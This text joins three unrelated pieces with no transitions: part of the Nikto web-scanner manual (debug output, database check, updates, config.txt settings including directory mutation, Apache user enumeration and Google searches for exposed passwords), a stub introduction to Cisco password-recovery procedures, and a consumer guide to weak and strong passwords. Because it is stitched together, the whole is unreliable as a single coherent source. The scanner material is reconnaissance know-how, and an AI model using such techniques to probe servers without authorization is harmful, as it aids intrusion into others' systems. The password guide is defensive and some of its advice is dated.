-debug

Enable verbose debug messages. This option cannot be abbreviated. It basically enumerates the LibWhisker request hash for each URL nikto retrieves. This information quickly becomes overwhelming; here's just a small portion of the information printed:
D: - Request Hash:
D: - Connection: Keep-Alive
D: - Content-Length: 0
D: - Host: 10.0.1.14
D: - User-Agent: Mozilla/4.75 (Nikto/1.30 )
D: - $whisker->INITIAL_MAGIC: 31337
D: - $whisker->anti_ids:
D: - $whisker->data:
D: - $whisker->force_bodysnatch: 0
D: - $whisker->force_close: 0
D: - $whisker->force_open: 0
D: - $whisker->host: 10.0.1.14
D: - $whisker->http_req_trailer:
D: - $whisker->http_ver: 1.1

-dbcheck

Perform a syntax check of the main scan_database.db and user_scan_database.db files. These files contain the specific tests that nikto performs against the server. You should need this only if you decide to customize one of these files (and if you do, consider dropping the nikto team an e-mail with your additions). This option cannot be abbreviated.

-update

Update nikto's plug-ins and find out whether a new version exists. This option cannot be abbreviated.

The -update option makes it easy to maintain nikto. It causes the program to connect to http://www.cirt.net and download the latest plug-ins to keep the scan list current:

$ ./nikto.pl -update
+ No updates required.
+ www.cirt.net message: Please report any bugs found in the 1.30 version

Config.txt Nikto uses the config.txt file to set certain options that are either used less often or are most likely to be used for every scan. This file includes a dozen settings. An option can be unset by commenting the line with a hash (#) symbol. Here are the default settings:

CGIDIRS=/bin/ /cgi/ /mpcgi/ /cgi-bin/ /cgi-sys/ /cgi-local/ /htbin/
/cgibin/ /cgis/ /scripts/ /cgi-win/ /fcgi-bin/
#CLIOPTS=-g -a
#NMAP=/usr/bin/nmap
SKIPPORTS=21 111
#PROXYHOST=10.1.1.1
#PROXYPORT=8080
#PROXYUSER=proxyuserid
#PROXYPASS=proxypassword
DEFAULTHTTPVER=1.1
#PLUGINDIR=/usr/local/nikto/plugins
MUTATEDIRS=/....../ /members/ /porn/ /restricted/ /xxx/
MUTATEFILES=xxx.htm xxx.html porn.htm porn.html
GOOGLERS=password passwd login

The CGIDIRS setting contains a space-delimited list of directories. Nikto tries to determine whether each directory exists before trying to find files within it, although the -allcgi option overrides this behavior.

The CLIOPTS setting contains command-line options to include every time nikto runs, which is useful for shortening the command line by placing the -generic, -verbose, and -web options here.

NMAP and SKIPPORTS control nikto's port-scanning behavior (-findonly). If the nmap binary is not provided (which is usually the case for Windows systems), nikto uses Perl functions to port scan. The SKIPPORTS setting contains a space-delimited list of port numbers never to scan.

Use the PROXY* settings to enable proxy support for nikto.

Although there is rarely a need to change the DEFAULTHTTPVER setting, you may find servers that support only version 1.0.

The PLUGINDIR setting points to the directory for default and user-defined plug-ins (equivalent to whisker scan.db files). By default, nikto looks for the /plugins subdirectory in the location from which it is executed.

The MUTATE* settings greatly increase the time it takes to scan a server with the -mutate option. MUTATEDIRS instructs nikto to run every check from the base directory or directories listed here. This is useful for web sites that use internationalization, whereby the /scripts directory becomes the /1033/scripts directory. The MUTATEFILES setting instructs nikto to run a check for each file against every directory in its current plug-in. Note that there are two mutate techniques, -mutate 3 and -mutate 4, that ignore these values. Technique 3 performs user enumeration against Apache servers by requesting /~user directories, which takes advantage of incorrectly configured public_html (UserDir module) settings in the httpd.conf file. Technique 4 is similar, but it uses the /cgi-bin/cgiwrap/~ method.

The GOOGLERS setting provides some fun Google searches for finding sensitive information. This technique is better accomplished with a browser and slightly more sophisticated searches; it serves more as a curiosity in nikto than as important functionality.


Introduction




This page is an index of password recovery procedures for Cisco products. For security reasons, the password recovery procedures listed here require physical access to the equipment.



Note: Cisco has announced the end of sale for the Cisco LocalDirector. Refer to the LocalDirector 400 Series End-of-Life and End-of-Sale Notices and Product Bulletins for more information.



Prerequisites

Requirements


There are no specific requirements for this document.



Components Used

This document is not restricted to specific software and hardware versions.



Conventions

Refer to Cisco Technical Tips Conventions for more information on document conventions.

















Create Strong Passwords

Examples of Threats:

  • When a password is stolen, a thief or hacker can easily access your private information and use your account.

  • Using the "remember password" function on your computer makes you vulnerable, especially if your laptop is stolen.

Our Tips:

  • Create strong passwords that use random combinations of uppercase and lowercase letters, numbers, and characters.

  • Use different passwords for each account.

  • Change your passwords every six months or so.

  • Do not use the remember password function on your Internet browser or other software programs.


Just about every account you access with your computer requires a password. In fact, you probably have to enter a password just to access your computer. Through the course of a day using your computer, you will likely access several programs or websites requiring a password. If you pay bills online, you will likely have dozens of accounts, each requiring a password. Here are some of the most common applications with password protection:

  • Logging in to your computer (Windows login)

  • Websites requiring a login account

  • E-mail accounts

  • Instant messaging services

  • Shared network files and directories

  • Broadband Internet account

  • Administrator access to your home network router

  • Wireless network encryption key (for example, WEP or WPA)

Because of the volume of passwords needed, most people create passwords that are easy for them to remember. The problem is that your password is the last line of defense protecting your personal and financial information. Chances are that your passwords are weak, meaning they are easy to crack, and we mean really easy. In this chapter, we explain the difference between weak and strong passwords, and we show you how to create strong passwords that are both hard for others to crack and yet easy for you to remember.

Anatomy of a Lousy Password

Before we get started on how to create a hard-to-crack password, let's look at the types of weak passwords that are overused and easy to break. How easy, you ask? Well, there is a free and easy-to-obtain program called Crack that can be used to systematically attempt to guess your password, trying out millions of passwords in a matter of hours through the use of an internal dictionary. This dictionary checks against every known word, in just about every language, with all standard manipulations, including character replacements, common misspellings, and letter reorderings. It also checks against names in every language (including the Chinese phone book). If that were not bad enough, it also checks against common character patterns, fictional characters and places, and every real place in the galaxy that has a name. In addition, it also checks every date in every format. In other words, if it is a person, a time, an event, a place, a thing, or even a thing's place, or a person's thing, it is a bad idea to use it as a password.

Hackers use programs such as this to conduct what are known as brute-force password attacks, meaning they use a program to keep trying password after password until they get a hit. Weak passwords make it much easier for such attacks.


password

This is not clever. Do not use any known words, especially this one.

wordpass

Also not clever and easily cracked because it is made up of common words.

drowssap

Crack (and other programs like it) checks for words written in reverse.

Pa$$word

Crack (and other programs like it) checks for character replacements.

passwurd

Crack (and other programs like it) checks for misspellings, phonetic or otherwise.

Password49

Adding numbers to the end of a word does not make a password harder to crack.

123password

Prefixing words with numbers does not make a password harder to crack.

wachtwoord

Using Dutch (or any other known language, including Klingon and Hobbit) does not help. Crack checks them all.

12345

This is just something an idiot would use on their luggage.

lkjhgf

This is a consecutive string of keyboard characters that is easy to crack.

14159265

Any nonsequential, but algorithmic pattern is easily cracked. (This is the first eight digits of pi to the right of the decimal point.)

abbcccdddd

Any repeating pattern is easily cracked.

mrsmee

Crack (and other programs like it) checks for literary characters.

lordnelson

Crack (and other programs like it) checks for real people and historical figures.

1600pennave

Do not use real addresses. Crack (and other programs like it) checks for them.

22 BakerSt

Crack (and other programs like it) checks for fake addresses, too.

Raleigh

Do not use real places. Crack (and other programs like it) checks for them.

munchkinland

Crack (and other programs like it) checks for made up places, too.


No password at all. Although this may be convenient for Windows login, it is ill advised.



These are just a few examples of weak and easily cracked passwords. In general, if you use something familiar to you, Crack and other programs like it will figure it out. Also, you should never use personal information such as dates, login names, Social Security numbers, or any other number associated with you for your password.

Now that we have probably convinced you to change all your passwords, let's look at what it takes for a password to be considered strong.


Elements of a Strong Password

In a few words, a strong password is a random bunch of letters, numbers, and characters, usually eight or more characters long. The eight-character thing is really about the math and not a hard-and-fast rule. In fact, the more characters, the better, but only if the password is truly random. Let's look briefly at why random passwords are so hard for Crack to break.

Assume for a moment that you have a completely random password, one that cannot be found in even the most complete cracking dictionary on Earth. In this case, the only way to crack the password is the brute-force method of checking against all possible character combinations. The best defense against this method is to stack the odds in your favor so that it comes close to mathematically impossible to guess the password.

Here is how that is done. To start with, we have a lot of characters to work with:

  • There are 26 letters in the English alphabet (a-z).

  • All can be capitalized (A-Z) or lowercase (a-z).

  • There are 10 numeric digits (0-9).

  • There are roughly 30 other special characters on a standard keyboard (!, <, @, >, ?, and so on). Not all are accepted by password-checking tools, so let's say about 15 of the 30 are.

If you create a truly random pattern of letters, numbers, and characters, there are about 77 possibilities (26 + 26 + 10 + 15) for each character in the password. If you use 8 characters, you raise that number to the power of 8, which gives you 1,235,736,291,547,681 combinations. It would take an awful lot of computing power (and several years) to try all the combinations that would eventually result in the right answer. To make it even harder on any would-be crackers, in addition to using a strong password you should change passwords periodically (we discuss how often a little later).

How to Create a Strong Password That You Can Remember

So here you are, knowing that you need a strong password, but how are you supposed to remember *Dsq#}3frP and 17 other uniquely random passwords for all your various accounts?

The answer is that you can use some personal information that will be easy for you to remember but difficult for others to guess. Here is how:


Start with a sentence about you or your family. For example:

My sister Joanne is four years older than my brother Matt

Take the first letter of each word. If you have a number in your sentence, use the number. The base password is now:

msji4yotmbm

Make case substitutions. With this sentence, we could use the grammatical capitalization for the password, giving us:

MsJi4yotmbM

Make character substitutions. Finally, look for opportunities to use other characters that will still be easy to remember, such as $ for s. Our final password looks like this:

"M$J!4y0tmbM"

Additional Password Tips

Here are some additional tips and considerations for passwords:

  • Do not reuse passwords. If at all possible, try to use a unique password for each of your accounts. If you only have one or two password-protected accounts, this should not be too hard. If you have several, however, it might be difficult to remember them all, even with the technique covered earlier. Consider writing them down in a safe place (but see the next tip).

  • Do not write your passwords down unless you can keep them safe. Most password advice says that you should never write down a password. We think this is a good guideline, but quite frankly most of us have 20 or more accounts. It is better to have a unique password for each account and to write them down somewhere, rather than creating a single password that you use on all your accounts. Here's the trick though: If you write down your passwords, keep them secured in a locked cabinet or safe. In your desk drawer or taped under your keyboard are all bad places for a written list of passwords. In a wallet, purse, or backpack is even worse. There are also programs such as Password Corral that allow you to store all of your passwords in a password-protected file on your PC. This way you only need to commit one password to memory. You can also write down the sentence if you used the method in the example earlier (My sister Joanne …); just remember your conversion rules and you can easily re-obtain your password.

  • Avoid using your passwords on public computers. Even if the remember-password function is turned off, there could be a keystroke logger or other hacking tool that someone has installed. Anything you type could be collected and used against you.

  • Never enable the remember-password option in Windows or Internet browsers. Even if you are using a computer that no one else uses, do not use this option. (This should be doubly obvious if you are using a shared computer.) Having this option turned on may be convenient, but if you ever lose your laptop (or if it is stolen), someone can easily check all the sites recently visited with your browser and get easy access to all your private information.

  • Never share your password with anyone. If you do, change it right away.

  • Never send your password in an e-mail. This is especially the case if you receive an e-mail asking for your account information, even if the e-mail looks legitimate.

  • Change your password periodically. Some experts advocate changing your passwords every three months. For most accounts, this is a bit much, especially if you create strong passwords such as the one shown earlier. A more realistic period is every six months or so. Never go more than a year with any password, and just so you know, rotating passwords among different accounts does not count as changing a password. Use the technique presented earlier and start from scratch. If you think you have been hacked, change all your passwords immediately.


Summary

Most people do not take their passwords seriously enough, opting for something convenient rather than something that actually protects their personal information. Do not make this mistake. A good password is your first and sometimes only defense against hackers and identity thieves. You should not use your spouse's name (or any other weak password) any more than you should attempt to lock a safe full of your valuables with a bread tie. Neither will stop someone from getting in and taking your stuff.
